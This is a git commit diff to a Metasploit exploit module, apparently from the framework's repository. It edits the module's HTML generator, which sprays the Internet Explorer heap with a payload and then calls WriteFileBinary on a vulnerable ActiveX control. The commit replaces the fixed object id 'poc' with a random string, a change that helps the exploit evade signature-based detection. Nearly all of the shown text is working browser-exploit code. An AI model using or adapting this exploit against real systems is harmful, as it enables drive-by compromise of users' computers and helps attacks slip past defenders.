Randomize object id
parent
66fa1b41aa
commit
f59f57e148
|
@ -215,6 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def load_exploit_html(my_target, cli)
|
||||
p = get_payload(my_target, cli)
|
||||
js = ie_heap_spray(my_target, p)
|
||||
object_id = rand_text_alpha(rand(10) + 8)
|
||||
|
||||
html = %Q|
|
||||
<html>
|
||||
|
@ -224,9 +225,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</script>
|
||||
</head>
|
||||
<body>
|
||||
<object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='poc'></object>
|
||||
<object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='#{object_id}'></object>
|
||||
<script language='javascript'>
|
||||
poc.WriteFileBinary("#{rand_text_alpha(4+ rand(4))}", 0x0c0c0c0c);
|
||||
#{object_id}.WriteFileBinary("#{rand_text_alpha(4+ rand(4))}", 0x0c0c0c0c);
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
|
Loading…
Reference in New Issue